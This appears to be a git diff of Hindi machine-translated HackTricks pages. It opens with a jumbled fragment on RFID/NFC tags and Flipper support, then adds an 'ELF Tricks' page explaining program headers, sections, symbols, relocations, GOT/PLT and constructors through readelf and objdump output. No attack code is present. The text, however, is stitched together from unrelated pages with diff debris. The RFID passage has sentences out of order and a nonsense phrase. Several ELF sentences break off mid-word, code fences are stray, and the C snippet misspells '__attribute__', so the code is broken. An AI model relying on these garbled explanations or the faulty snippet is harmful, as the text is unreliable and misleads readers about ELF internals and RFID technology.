यह आमतौर पर बैंक कार्ड, सार्वजनिक परिवहन और अन्य सुरक्षित पास में पाया जाता है।
**हाई-फ्रीक्वेंसी 13.56 MHz टैग एक सेट के मानक और प्रोटोकॉल हैं**। इन्हें आमतौर पर [NFC](https://nfc-forum.org/what-is-nfc/about-the-technology/) के रूप में संदर्भित किया जाता है, लेकिन यह हमेशा सही नहीं होता है। भौतिक और तार्किक स्तरों पर उपयोग होने वाले मूल्यांकन प्रोटोकॉल सेट ISO 14443 है। उच्च स्तर के प्रोटोकॉल, साथ ही वैकल्पिक मानक (जैसे ISO 19092), इस पर आधारित होते हैं। बहुत से लोग इस प्रौद्योगिकी को **नियर फ़ील्ड संचार (NFC)** के रूप में संदर्भित करते हैं, जो 13.56 MHz फ़्रीक्वेंसी पर कार्य करने वाले उपकरणों के लिए एक शब्द है। ### कम और उच्च फ्रीक्वेंसी टैग तुलना
<figure><img src="../.gitbook/assets/image (22).png" alt=""><figcaption></figcaption></figure> <figure><img src="../.gitbook/assets/image (27).png" alt=""><figcaption></figcaption></figure>
सीधे शब्दों में कहें तो, NFC की वाणिज्यिक व्यवस्था इस प्रकार काम करती है: कार्ड बनाने वाली कंपनी द्वारा प्रेषण प्रोटोकॉल चुना जाता है और यह निम्न स्तरीय ISO 14443 पर आधारित होता है। उदाहरण के लिए, NXP ने अपना उच्च स्तरीय प्रेषण प्रोटोकॉल Mifare का आविष्कार किया। लेकिन निम्न स्तर पर, Mifare कार्ड ISO 14443-A मानक पर आधारित होते हैं। ## कम फ्रीक्वेंसी RFID टैग (125kHz)
फ्लिपर निम्न स्तरीय ISO 14443 प्रोटोकॉल, साथ ही Mifare Ultralight डेटा ट्रांसफर प्रोटोकॉल और बैंक कार्ड में उपयोग होने वाले EMV के साथ संवाद कर सकता है। हम Mifare Classic और NFC NDEF के समर्थन जोड़ने पर काम कर रहे हैं। NFC के बनाने वाले प्रोटोकॉल और मानकों का एक विस्तृत अध्ययन एक अलग लेख के लिए महत्वपूर्ण है, जिसे हम बाद में अपलोड करने की योजना बना रहे हैं। **कम फ्रीक्वेंसी टैग** उन सिस्टमों में उपयोग किए जाते हैं जो **उच्च सुरक्षा की आवश्यकता नहीं है**: इमारत एक्सेस, इंटरकॉम की, जिम सदस्यता कार
ISO 14443-A मानक पर आधारित सभी हाई-फ्रीक्वेंसी कार्डों में एक अद्वितीय चिप आईडी होता है। यह कार्ड की सीरियल नंबर की तरह कार्ड का कार्य करता है, जैसे नेटवर्क कार्ड का MAC पता। **आमतौर पर, UID 4 या 7 बाइट लंबा होता है**, लेकिन कभी-कभी यह **10 तक** जा सकता है। UID एक गोपनीयता नहीं है और इसे आसानी से पढ़ा जा सकता है, **कभी-कभी कार्ड पर छपा होता है**
UID का उपयोग प्रमाणीकरण और पहुंच प्रदान करने के लिए कई एक्सेस कंट्रोल सिस्टम करते हैं। कभी-कभी ऐसा होता है **जब भी** RFID टैग्स **क्रिप्टोग्राफी का समर्थन करते हैं**। ऐसे **गलत उपयोग** से वे सुरक्षा के मामले में दुम्ब द्विसौंदर्य 125 kHz कार्डों के स्तर तक आ जाते हैं। वर्चुअल कार्ड (जैसे Apple Pay) फ़ोन मालिक अपने भुगतान ऐप के साथ दरवाज़े नहीं खोलेंगे, इसलिए वे एक गतिशील UID का उपयोग करते हैं।
* **कम दायरा** — हाई-फ्रीक्वेंसी कार्डों को विशेष रूप से इसलिए डिज़ाइन किया जाता है कि उन्हें रीडर के पास रखना होता है। इससे कार्ड को अनधिकृत इंटरेक्शन से सुरक्षित रखने में भी मदद मिलती है। हमने प्रबंधित किए गए उच्च दायरे वाले रीडर के साथ अधिकतम पठन दायरा 15 सेमी तक प्राप्त किया था।
* **उन्नत प्रोटोकॉल** — 424 kbps तक की डेटा ट्रांसफर गति उच्च स्तर के प्रोटोकॉल को समर्थन करती है, जिससे पूर्ण-विक

View file

@ -0,0 +1,369 @@
# ELF ट्रिक्स
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks\_live)** का** **अनुसरण** करें।
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स रेपो** [**hacktricks**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को PR जमा करके**
</details>
## प्रोग्राम हेडर्स
यह लोडर को बताते हैं कि ELF को मेमोरी में कैसे लोड करना है:
```bash
readelf -lW lnstat
Elf file type is DYN (Position-Independent Executable file)
Entry point 0x1c00
There are 9 program headers, starting at offset 64
Program Headers:
Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align
PHDR 0x000040 0x0000000000000040 0x0000000000000040 0x0001f8 0x0001f8 R 0x8
INTERP 0x000238 0x0000000000000238 0x0000000000000238 0x00001b 0x00001b R 0x1
[Requesting program interpreter: /lib/ld-linux-aarch64.so.1]
LOAD 0x000000 0x0000000000000000 0x0000000000000000 0x003f7c 0x003f7c R E 0x10000
LOAD 0x00fc48 0x000000000001fc48 0x000000000001fc48 0x000528 0x001190 RW 0x10000
DYNAMIC 0x00fc58 0x000000000001fc58 0x000000000001fc58 0x000200 0x000200 RW 0x8
NOTE 0x000254 0x0000000000000254 0x0000000000000254 0x0000e0 0x0000e0 R 0x4
GNU_EH_FRAME 0x003610 0x0000000000003610 0x0000000000003610 0x0001b4 0x0001b4 R 0x4
GNU_STACK 0x000000 0x0000000000000000 0x0000000000000000 0x000000 0x000000 RW 0x10
GNU_RELRO 0x00fc48 0x000000000001fc48 0x000000000001fc48 0x0003b8 0x0003b8 R 0x1
Section to Segment mapping:
Segment Sections...
00
01 .interp
02 .interp .note.gnu.build-id .note.ABI-tag .note.package .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame
03 .init_array .fini_array .dynamic .got .data .bss
04 .dynamic
05 .note.gnu.build-id .note.ABI-tag .note.package
06 .eh_frame_hdr
07
08 .init_array .fini_array .dynamic .got
```
पिछले कार्यक्रम में **9 कार्यक्रम हेडर** हैं, फिर, **सेगमेंट मैपिंग** इसका संकेत देता है कि प्रत्येक सेक्शन किस प्रोग्राम हेडर (00 से 08 तक) में स्थित है।
### PHDR - प्रोग्राम हेडर
प्रोग्राम हेडर तालिकाएँ और मेटाडेटा स्वयं को समाहित करता है।
### INTERP
बाइनरी को मेमोरी में लोड करने के लिए उपयोग करने के लिए लोडर का पथ दर्शाता है।
### LOAD
ये हेडर इसका संकेत देते हैं कि **मेमोरी में बाइनरी को कैसे लोड करें**।\
प्रत्येक **LOAD** हेडर एक **मेमोरी क्षेत्र** (आकार, अनुमतियाँ और संरेखण) को दर्शाता है और ELF **बाइनरी के बाइट्स की कॉपी करने के लिए** संकेत देता है।
उदाहरण के लिए, दूसरा हेडर 0x1190 का आकार है, 0x1fc48 पर स्थित होना चाहिए, पढ़ने और लिखने की अनुमतियों के साथ है और 0xfc48 से 0x528 के साथ भरा जाएगा (यह सभी आरक्षित स्थान को भरता नहीं है)। यह मेमोरी सेक्शन `.init_array .fini_array .dynamic .got .data .bss` को शामिल करेगा।
### DYNAMIC
यह हेडर कार्यक्रमों को उनके पुस्तकालय आवश्यकताओं से लिंक करने और स्थानांतरणों को लागू करने में मदद करता है। **`.dynamic`** सेक्शन की जाँच करें।
### NOTE
बाइनरी के बारे में विक्रेता मेटाडेटा जानकारी संग्रहित करता है।
### GNU\_EH\_FRAME
स्टैक अनवाइंड टेबल का स्थान परिभाषित करता है, जिसे डीबगर और सी++ अपशिष्ट-हैंडलिंग-रनटाइम फ़ंक्शनों द्वारा उपयोग किया जाता है।
### GNU\_STACK
स्टैक निषेध रक्षा की विन्यासिकता को शामिल करता है। यदि सक्षम है, तो बाइनरी स्टैक से कोड नहीं चला सकेगा।
### GNU\_RELRO
बाइनरी की RELRO (स्थानांतरण केवल पढ़ने योग्य) विन्यासिकता को दर्शाता है। यह सुरक्षा विशेष रूप से मेमोरी के कुछ सेक्शन को केवल पढ़ने योग्य मार्क करेगी (जैसे `GOT` या `init` और `fini` टेबल) जब प्रोग्राम लोड हो जाएगा और इसे चलाने से पहले।
पिछले उदाहरण में 0x3b8 बाइट को 0x1fc48 पर पढ़ने योग्य रूप में कॉपी किया जा रहा है, `.init_array .fini_array .dynamic .got .data .bss` सेक्शन को प्रभावित करते हुए।
ध्यान दें कि RELRO आंशिक या पूर्ण हो सकता है, आंशिक संस्करण **`.plt.got`** सेक्शन को संरेखित करता है, जिसे **लेजी बाइंडिंग** के लिए उपयोग किया जाता है और इस स्मृति स्थान को **लिखने की अनुमति** होनी चाहिए ताकि पहली बार उनकी स्थान खोजी जाए।
### TLS
TLS प्रविष्टियों की एक तालिका को परिभाषित करता है, जो सूत्र-स्थानीय चरित्र चर्चाओं के बारे में जानकारी संग्रहित करती है।
## सेक्शन हेडर
सेक्शन हेडर ELF बाइनरी का एक और विस्तृत दृश्य प्रदान करता है।
```
objdump lnstat -h
lnstat: file format elf64-littleaarch64
Sections:
Idx Name Size VMA LMA File off Algn
0 .interp 0000001b 0000000000000238 0000000000000238 00000238 2**0
CONTENTS, ALLOC, LOAD, READONLY, DATA
1 .note.gnu.build-id 00000024 0000000000000254 0000000000000254 00000254 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
2 .note.ABI-tag 00000020 0000000000000278 0000000000000278 00000278 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
3 .note.package 0000009c 0000000000000298 0000000000000298 00000298 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
4 .gnu.hash 0000001c 0000000000000338 0000000000000338 00000338 2**3
CONTENTS, ALLOC, LOAD, READONLY, DATA
5 .dynsym 00000498 0000000000000358 0000000000000358 00000358 2**3
CONTENTS, ALLOC, LOAD, READONLY, DATA
6 .dynstr 000001fe 00000000000007f0 00000000000007f0 000007f0 2**0
CONTENTS, ALLOC, LOAD, READONLY, DATA
7 .gnu.version 00000062 00000000000009ee 00000000000009ee 000009ee 2**1
CONTENTS, ALLOC, LOAD, READONLY, DATA
8 .gnu.version_r 00000050 0000000000000a50 0000000000000a50 00000a50 2**3
CONTENTS, ALLOC, LOAD, READONLY, DATA
9 .rela.dyn 00000228 0000000000000aa0 0000000000000aa0 00000aa0 2**3
CONTENTS, ALLOC, LOAD, READONLY, DATA
10 .rela.plt 000003c0 0000000000000cc8 0000000000000cc8 00000cc8 2**3
CONTENTS, ALLOC, LOAD, READONLY, DATA
11 .init 00000018 0000000000001088 0000000000001088 00001088 2**2
CONTENTS, ALLOC, LOAD, READONLY, CODE
12 .plt 000002a0 00000000000010a0 00000000000010a0 000010a0 2**4
CONTENTS, ALLOC, LOAD, READONLY, CODE
13 .text 00001c34 0000000000001340 0000000000001340 00001340 2**6
CONTENTS, ALLOC, LOAD, READONLY, CODE
14 .fini 00000014 0000000000002f74 0000000000002f74 00002f74 2**2
CONTENTS, ALLOC, LOAD, READONLY, CODE
15 .rodata 00000686 0000000000002f88 0000000000002f88 00002f88 2**3
CONTENTS, ALLOC, LOAD, READONLY, DATA
16 .eh_frame_hdr 000001b4 0000000000003610 0000000000003610 00003610 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
17 .eh_frame 000007b4 00000000000037c8 00000000000037c8 000037c8 2**3
CONTENTS, ALLOC, LOAD, READONLY, DATA
18 .init_array 00000008 000000000001fc48 000000000001fc48 0000fc48 2**3
CONTENTS, ALLOC, LOAD, DATA
19 .fini_array 00000008 000000000001fc50 000000000001fc50 0000fc50 2**3
CONTENTS, ALLOC, LOAD, DATA
20 .dynamic 00000200 000000000001fc58 000000000001fc58 0000fc58 2**3
CONTENTS, ALLOC, LOAD, DATA
21 .got 000001a8 000000000001fe58 000000000001fe58 0000fe58 2**3
CONTENTS, ALLOC, LOAD, DATA
22 .data 00000170 0000000000020000 0000000000020000 00010000 2**3
CONTENTS, ALLOC, LOAD, DATA
23 .bss 00000c68 0000000000020170 0000000000020170 00010170 2**3
ALLOC
24 .gnu_debugaltlink 00000049 0000000000000000 0000000000000000 00010170 2**0
CONTENTS, READONLY
25 .gnu_debuglink 00000034 0000000000000000 0000000000000000 000101bc 2**2
CONTENTS, READONLY
```
### मेटा खंड
* **स्ट्रिंग टेबल**: यह सभी स्ट्रिंग्स को समायोजित करता है जो ELF फ़ाइल द्वारा आवश्यक हैं (लेकिन वास्तव में कार्यक्रम द्वारा उपयोग की जाने वाली नहीं।) उदाहरण के लिए, यह खंड धाराएँ नामों को शामिल करता है जैसे `.text` या `.data`। और यदि `.text` स्ट्रिंग टेबल में 45 ऑफसेट पर है तो यह **नाम** फ़ील्ड में **45** नंबर का उपयोग करेगा।
* स्ट्रिंग टेबल का पता लगाने के लिए, ELF में स्ट्रिंग टेबल के लिए एक पॉइंटर होता है।
* **सिम्बल टेबल**: इसमें सिम्बल के बारे में जानकारी होती है जैसे नाम (स्ट्रिंग टेबल में ऑफसेट), पता, आकार और सिम्बल के बारे में अधिक मेटाडेटा।
### मुख्य खंड
* **`.text`**: कार्यक्रम के निर्देशों को चलाने के लिए।
* **`.data`**: कार्यक्रम में परिभाषित मान वाले ग्लोबल वेरिएबल्स।
* **`.bss`**: अपरिभाषित ग्लोबल वेरिएबल्स (या जीरो से आरंभित)। यहाँ के वेरिएबल्स स्वचालित रूप से शून्य पर आरंभित होते हैं इसलिए बाइनरी में अनावश्यक शून्यों को जोड़ने से बचाते हैं।
* **`.rodata`**: स्थिर ग्लोबल वेरिएबल्स (केवल पढ़ने योग्य खंड)।
* **`.tdata`** और **`.tbss`**: जब स्थानीय धागी वेरिएबल्स का उपयोग किया जाता है (C++ में `__thread_local` या `__thread` में) तो जैसे .data और .bss।
* **`.dynamic`**: नीचे देखें।
## सिम्बल्स
सिम्बल्स एक नामित स्थान हैं कार्यक्रम में जो कि एक फ़ंक्शन, एक ग्लोबल डेटा ऑब्ज
```
readelf -s lnstat
Symbol table '.dynsym' contains 49 entries:
Num: Value Size Type Bind Vis Ndx Name
0: 0000000000000000 0 NOTYPE LOCAL DEFAULT UND
1: 0000000000001088 0 SECTION LOCAL DEFAULT 12 .init
2: 0000000000020000 0 SECTION LOCAL DEFAULT 23 .data
3: 0000000000000000 0 FUNC GLOBAL DEFAULT UND strtok@GLIBC_2.17 (2)
4: 0000000000000000 0 FUNC GLOBAL DEFAULT UND s[...]@GLIBC_2.17 (2)
5: 0000000000000000 0 FUNC GLOBAL DEFAULT UND strlen@GLIBC_2.17 (2)
6: 0000000000000000 0 FUNC GLOBAL DEFAULT UND fputs@GLIBC_2.17 (2)
7: 0000000000000000 0 FUNC GLOBAL DEFAULT UND exit@GLIBC_2.17 (2)
8: 0000000000000000 0 FUNC GLOBAL DEFAULT UND _[...]@GLIBC_2.34 (3)
9: 0000000000000000 0 FUNC GLOBAL DEFAULT UND perror@GLIBC_2.17 (2)
10: 0000000000000000 0 NOTYPE WEAK DEFAULT UND _ITM_deregisterT[...]
11: 0000000000000000 0 FUNC WEAK DEFAULT UND _[...]@GLIBC_2.17 (2)
12: 0000000000000000 0 FUNC GLOBAL DEFAULT UND putc@GLIBC_2.17 (2)
[...]
```
Each symbol entry contains:
* **नाम**
* **बाइंडिंग गुण** (कमजोर, स्थानीय या ग्लोबल): स्थानीय प्रतीक केवल कार्यक्रम द्वारा ही पहुंचा जा सकता है जबकि ग्लोबल प्रतीक कार्यक्रम के बाहर साझा किए जाते हैं। एक कमजोर वस्तु उदाहरण के लिए एक फ़ंक्शन है जिसे एक अलग से ओवरराइड किया जा सकता है।
* **प्रकार**: NOTYPE (कोई प्रकार निर्दिष्ट नहीं), OBJECT (ग्लोबल डेटा वेरिएबल), FUNC (फ़ंक्शन), SECTION (खंड), FILE (डीबगर्स के लिए स्रोत-कोड फ़ाइल), TLS (स्थानीय धागा-स्थायी चर), GNU\_IFUNC (पुनर्स्थापन के लिए अप्रत्यक्ष फ़ंक्शन)
* **खंड** सूची जिसमें यह स्थित है
* **मान** (मेमोरी में पता)
* **आकार**
## गतिशील खंड
```
readelf -d lnstat
Dynamic section at offset 0xfc58 contains 28 entries:
Tag Type Name/Value
0x0000000000000001 (NEEDED) Shared library: [libc.so.6]
0x0000000000000001 (NEEDED) Shared library: [ld-linux-aarch64.so.1]
0x000000000000000c (INIT) 0x1088
0x000000000000000d (FINI) 0x2f74
0x0000000000000019 (INIT_ARRAY) 0x1fc48
0x000000000000001b (INIT_ARRAYSZ) 8 (bytes)
0x000000000000001a (FINI_ARRAY) 0x1fc50
0x000000000000001c (FINI_ARRAYSZ) 8 (bytes)
0x000000006ffffef5 (GNU_HASH) 0x338
0x0000000000000005 (STRTAB) 0x7f0
0x0000000000000006 (SYMTAB) 0x358
0x000000000000000a (STRSZ) 510 (bytes)
0x000000000000000b (SYMENT) 24 (bytes)
0x0000000000000015 (DEBUG) 0x0
0x0000000000000003 (PLTGOT) 0x1fe58
0x0000000000000002 (PLTRELSZ) 960 (bytes)
0x0000000000000014 (PLTREL) RELA
0x0000000000000017 (JMPREL) 0xcc8
0x0000000000000007 (RELA) 0xaa0
0x0000000000000008 (RELASZ) 552 (bytes)
0x0000000000000009 (RELAENT) 24 (bytes)
0x000000000000001e (FLAGS) BIND_NOW
0x000000006ffffffb (FLAGS_1) Flags: NOW PIE
0x000000006ffffffe (VERNEED) 0xa50
0x000000006fffffff (VERNEEDNUM) 2
0x000000006ffffff0 (VERSYM) 0x9ee
0x000000006ffffff9 (RELACOUNT) 15
0x0000000000000000 (NULL) 0x0
```
आवश्यक निर्देशिका इसका संकेत देती है कि कार्यक्रम **उस उल्लिखित पुस्तकालय को लोड करने की आवश्यकता** है ताकि आगे बढ़ सके। जब साझा **पुस्तकालय पूरी तरह से संचालनयोग्य और उपयुक्त हो जाता है**, तो आवश्यक निर्देशिका पूरी हो जाती है।
## पुनर्थान
लोडर को इन्हें लोड करने के बाद आवश्यकताओं को पुनर्थान करना भी आवश्यक है। ये पुनर्थान पुस्तकालय में पुनर्थान सारणी में REL या RELA प्रारूप में दिखाए जाते हैं और पुनर्थानों की संख्या डायनामिक खंडों RELSZ या RELASZ में दी जाती है।
```
readelf -r lnstat
Relocation section '.rela.dyn' at offset 0xaa0 contains 23 entries:
Offset Info Type Sym. Value Sym. Name + Addend
00000001fc48 000000000403 R_AARCH64_RELATIV 1d10
00000001fc50 000000000403 R_AARCH64_RELATIV 1cc0
00000001fff0 000000000403 R_AARCH64_RELATIV 1340
000000020008 000000000403 R_AARCH64_RELATIV 20008
000000020010 000000000403 R_AARCH64_RELATIV 3330
000000020030 000000000403 R_AARCH64_RELATIV 3338
000000020050 000000000403 R_AARCH64_RELATIV 3340
000000020070 000000000403 R_AARCH64_RELATIV 3348
000000020090 000000000403 R_AARCH64_RELATIV 3350
0000000200b0 000000000403 R_AARCH64_RELATIV 3358
0000000200d0 000000000403 R_AARCH64_RELATIV 3360
0000000200f0 000000000403 R_AARCH64_RELATIV 3370
000000020110 000000000403 R_AARCH64_RELATIV 3378
000000020130 000000000403 R_AARCH64_RELATIV 3380
000000020150 000000000403 R_AARCH64_RELATIV 3388
00000001ffb8 000a00000401 R_AARCH64_GLOB_DA 0000000000000000 _ITM_deregisterTM[...] + 0
00000001ffc0 000b00000401 R_AARCH64_GLOB_DA 0000000000000000 __cxa_finalize@GLIBC_2.17 + 0
00000001ffc8 000f00000401 R_AARCH64_GLOB_DA 0000000000000000 stderr@GLIBC_2.17 + 0
00000001ffd0 001000000401 R_AARCH64_GLOB_DA 0000000000000000 optarg@GLIBC_2.17 + 0
00000001ffd8 001400000401 R_AARCH64_GLOB_DA 0000000000000000 stdout@GLIBC_2.17 + 0
00000001ffe0 001e00000401 R_AARCH64_GLOB_DA 0000000000000000 __gmon_start__ + 0
00000001ffe8 001f00000401 R_AARCH64_GLOB_DA 0000000000000000 __stack_chk_guard@GLIBC_2.17 + 0
00000001fff8 002e00000401 R_AARCH64_GLOB_DA 0000000000000000 _ITM_registerTMCl[...] + 0
Relocation section '.rela.plt' at offset 0xcc8 contains 40 entries:
Offset Info Type Sym. Value Sym. Name + Addend
00000001fe70 000300000402 R_AARCH64_JUMP_SL 0000000000000000 strtok@GLIBC_2.17 + 0
00000001fe78 000400000402 R_AARCH64_JUMP_SL 0000000000000000 strtoul@GLIBC_2.17 + 0
00000001fe80 000500000402 R_AARCH64_JUMP_SL 0000000000000000 strlen@GLIBC_2.17 + 0
00000001fe88 000600000402 R_AARCH64_JUMP_SL 0000000000000000 fputs@GLIBC_2.17 + 0
00000001fe90 000700000402 R_AARCH64_JUMP_SL 0000000000000000 exit@GLIBC_2.17 + 0
00000001fe98 000800000402 R_AARCH64_JUMP_SL 0000000000000000 __libc_start_main@GLIBC_2.34 + 0
00000001fea0 000900000402 R_AARCH64_JUMP_SL 0000000000000000 perror@GLIBC_2.17 + 0
00000001fea8 000b00000402 R_AARCH64_JUMP_SL 0000000000000000 __cxa_finalize@GLIBC_2.17 + 0
00000001feb0 000c00000402 R_AARCH64_JUMP_SL 0000000000000000 putc@GLIBC_2.17 + 0
00000001feb8 000d00000402 R_AARCH64_JUMP_SL 0000000000000000 opendir@GLIBC_2.17 + 0
00000001fec0 000e00000402 R_AARCH64_JUMP_SL 0000000000000000 fputc@GLIBC_2.17 + 0
00000001fec8 001100000402 R_AARCH64_JUMP_SL 0000000000000000 snprintf@GLIBC_2.17 + 0
00000001fed0 001200000402 R_AARCH64_JUMP_SL 0000000000000000 __snprintf_chk@GLIBC_2.17 + 0
00000001fed8 001300000402 R_AARCH64_JUMP_SL 0000000000000000 malloc@GLIBC_2.17 + 0
00000001fee0 001500000402 R_AARCH64_JUMP_SL 0000000000000000 gettimeofday@GLIBC_2.17 + 0
00000001fee8 001600000402 R_AARCH64_JUMP_SL 0000000000000000 sleep@GLIBC_2.17 + 0
00000001fef0 001700000402 R_AARCH64_JUMP_SL 0000000000000000 __vfprintf_chk@GLIBC_2.17 + 0
00000001fef8 001800000402 R_AARCH64_JUMP_SL 0000000000000000 calloc@GLIBC_2.17 + 0
00000001ff00 001900000402 R_AARCH64_JUMP_SL 0000000000000000 rewind@GLIBC_2.17 + 0
00000001ff08 001a00000402 R_AARCH64_JUMP_SL 0000000000000000 strdup@GLIBC_2.17 + 0
00000001ff10 001b00000402 R_AARCH64_JUMP_SL 0000000000000000 closedir@GLIBC_2.17 + 0
00000001ff18 001c00000402 R_AARCH64_JUMP_SL 0000000000000000 __stack_chk_fail@GLIBC_2.17 + 0
00000001ff20 001d00000402 R_AARCH64_JUMP_SL 0000000000000000 strrchr@GLIBC_2.17 + 0
00000001ff28 001e00000402 R_AARCH64_JUMP_SL 0000000000000000 __gmon_start__ + 0
00000001ff30 002000000402 R_AARCH64_JUMP_SL 0000000000000000 abort@GLIBC_2.17 + 0
00000001ff38 002100000402 R_AARCH64_JUMP_SL 0000000000000000 feof@GLIBC_2.17 + 0
00000001ff40 002200000402 R_AARCH64_JUMP_SL 0000000000000000 getopt_long@GLIBC_2.17 + 0
00000001ff48 002300000402 R_AARCH64_JUMP_SL 0000000000000000 __fprintf_chk@GLIBC_2.17 + 0
00000001ff50 002400000402 R_AARCH64_JUMP_SL 0000000000000000 strcmp@GLIBC_2.17 + 0
00000001ff58 002500000402 R_AARCH64_JUMP_SL 0000000000000000 free@GLIBC_2.17 + 0
00000001ff60 002600000402 R_AARCH64_JUMP_SL 0000000000000000 readdir64@GLIBC_2.17 + 0
00000001ff68 002700000402 R_AARCH64_JUMP_SL 0000000000000000 strndup@GLIBC_2.17 + 0
00000001ff70 002800000402 R_AARCH64_JUMP_SL 0000000000000000 strchr@GLIBC_2.17 + 0
00000001ff78 002900000402 R_AARCH64_JUMP_SL 0000000000000000 fwrite@GLIBC_2.17 + 0
00000001ff80 002a00000402 R_AARCH64_JUMP_SL 0000000000000000 fflush@GLIBC_2.17 + 0
00000001ff88 002b00000402 R_AARCH64_JUMP_SL 0000000000000000 fopen64@GLIBC_2.17 + 0
00000001ff90 002c00000402 R_AARCH64_JUMP_SL 0000000000000000 __isoc99_sscanf@GLIBC_2.17 + 0
00000001ff98 002d00000402 R_AARCH64_JUMP_SL 0000000000000000 strncpy@GLIBC_2.17 + 0
00000001ffa0 002f00000402 R_AARCH64_JUMP_SL 0000000000000000 __assert_fail@GLIBC_2.17 + 0
00000001ffa8 003000000402 R_AARCH64_JUMP_SL 0000000000000000 fgets@GLIBC_2.17 + 0
```
### स्थैतिक पुनर्स्थापना
यदि **प्रोग्राम पसंदीदा पते से भिन्न स्थान पर लोड** किया गया है (सामान्यत: 0x400000) क्योंकि पता पहले से ही उपयोग में है या **ASLR** या किसी अन्य कारण से, एक स्थैतिक पुनर्स्थापना **सही करती है** जिन पॉइंटर्स के मान बाइनरी को पसंदीदा पते पर लोड होने की उम्मीद हैं।
उदाहरण के लिए किसी भी खंड का प्रकार `R_AARCH64_RELATIV` को पुनर्स्थापना बायस प्लस एडेंड मान परिवर्तित करना चाहिए।
### गतिशील पुनर्स्थापना और GOT
पुनर्स्थापना एक बाह्य प्रतीक (जैसे एक निर्भरता से फ़ंक्शन) को भी संदर्भित कर सकती है। जैसे libC से malloc फ़ंक्शन। तब, जब लोडर libC को एक पते में लोड करता है जहां malloc फ़ंक्शन लोड होता है, तो यह GOT (Global Offset Table) तालिका में इस पते को लिखेगा (पुनर्स्थापना तालिका में सूचित) जहां malloc का पता निर्दिष्ट होना चाहिए।
### प्रक्रिया संबंधन सारणी
PLT खंड को आलसी बाइंडिंग करने की अनुमति देता है, जिसका मतलब है कि फ़ंक्शन के स्थान का समाधान पहली बार किया जाएगा जब यह उपयोग किया जाएगा।
तो जब एक प्रोग्राम malloc को कॉल करता है, वास्तव में यह `malloc` के संबंधित स्थान को PLT में कॉल करता है (`malloc@plt`)। जब यह पहली बार कॉल होता है, तो यह `malloc` का पता स्थानांतरित करता है और इसे स्टोर करता है ताकि अगली बार `malloc` को कॉल किया जाए, उस पते का उपयोग किया जाए बजाय PLT कोड के।
## प्रोग्राम प्रारंभीकरण
प्रोग्राम लोड होने के बाद इसे चलाने का समय है। हालांकि, पहला कोड जो चलाया जाता है **हमेशा `main` नहीं** होता है। यह इसलिए है क्योंकि उदाहरण के लिए C++ में यदि एक **ग्लोबल वेरिएबल किसी क्लास के ऑब्ज
```cpp
#include <stdio.h>
// g++ autoinit.cpp -o autoinit
class AutoInit {
public:
AutoInit() {
printf("Hello AutoInit!\n");
}
~AutoInit() {
printf("Goodbye AutoInit!\n");
}
};
AutoInit autoInit;
int main() {
printf("Main\n");
return 0;
}
```
```
ध्यान दें कि ये ग्लोबल वेरिएबल्स `.data` या `.bss` में स्थित होते हैं लेकिन सूचियों `__CTOR_LIST__` और `__DTOR_LIST__` में ऑब्जेक्ट्स को इनिशियलाइज और डीस्ट्रक्ट करने के लिए क्रम में स्टोर किया जाता है ताकि उनका ट्रैक रखा जा सके।
सी कोड से GNU एक्सटेंशन का उपयोग करके एक ही परिणाम प्राप्त करना संभव है:
```
```c
__attributte__((constructor)) //Add a constructor to execute before
__attributte__((destructor)) //Add to the destructor list
```
कॉम्पाइलर की दृष्टि से, `main` फ़ंक्शन के पहले और बाद में इन क्रियाओं को निष्पादित करने के लिए, `init` फ़ंक्शन और `fini` फ़ंक्शन बनाना संभव है जिन्हें डायनामिक सेक्शन में **`INIT`** और **`FIN`** के रूप में संदर्भित किया जाएगा और ये ELF के `init` और `fini` सेक्शन में रखे जाएंगे।
दूसरा विकल्प, जैसा कि उल्लिखित है, है **`INIT_ARRAY`** और **`FINI_ARRAY`** प्रविष्टियों में **`__CTOR_LIST__`** और **`__DTOR_LIST__`** की संदर्भित करना और इनकी लंबाई को **`INIT_ARRAYSZ`** और **`FINI_ARRAYSZ`** द्वारा दर्शाया जाता है। प्रत्येक प्रविष्टि एक फ़ंक्शन पॉइंटर है जो बिना तार्गेट के कॉल किया जाएगा।
इसके अतिरिक्त, **`INIT_ARRAY`** पॉइंटरों से **पहले** निष्पादित होने वाले **पॉइंटर** के साथ एक **`PREINIT_ARRAY`** भी संभव है।

View file

@ -2,21 +2,21 @@
<details> <details>
